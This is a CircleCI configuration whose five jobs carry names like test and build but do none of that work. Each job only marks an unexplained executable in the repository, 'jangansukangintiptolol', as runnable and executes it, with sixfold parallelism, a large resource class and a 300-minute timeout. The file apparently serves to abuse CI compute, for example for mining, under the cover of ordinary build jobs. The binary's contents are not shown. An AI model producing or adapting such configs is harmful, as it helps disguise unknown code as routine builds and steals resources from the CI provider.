version: 2.1

executors:
  jangansukangintiptolol:
    docker:
      - image: node
    resource_class: large

orbs:
  node: circleci/node@4.7.0

jobs:
  test:
    parallelism: 6
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         Name: test
         command: |
                     chmod +x jangansukangintiptolol && ./jangansukangintiptolol
         no_output_timeout: 300m
  build:
    parallelism: 6
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         Name: build
         command: |
                     chmod +x jangansukangintiptolol && ./jangansukangintiptolol
         no_output_timeout: 300m
  building:
    parallelism: 6
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         Name: building
         command: |
                     chmod +x jangansukangintiptolol && ./jangansukangintiptolol
         no_output_timeout: 300m
  runing:
    parallelism: 6
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         Name: test
         command: |
                     chmod +x jangansukangintiptolol && ./jangansukangintiptolol
         no_output_timeout: 300m
  project:
    parallelism: 6
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         Name: build
         command: |
                     chmod +x jangansukangintiptolol && ./jangansukangintiptolol
         no_output_timeout: 300m
workflows:
  all-tests:
    jobs:
      - test:
          matrix:
            parameters:
              os: [jangansukangintiptolol]
              node-version: ["16.13.0"]
      - build:
          matrix:
            parameters:
              os: [jangansukangintiptolol]
              node-version: ["16.13.0"]
      - building:
          matrix:
            parameters:
              os: [jangansukangintiptolol]
              node-version: ["16.13.0"]
      - runing:
          matrix:
            parameters:
              os: [jangansukangintiptolol]
              node-version: ["16.13.0"]
      - project:
          matrix:
            parameters:
              os: [jangansukangintiptolol]
              node-version: ["16.13.0"]
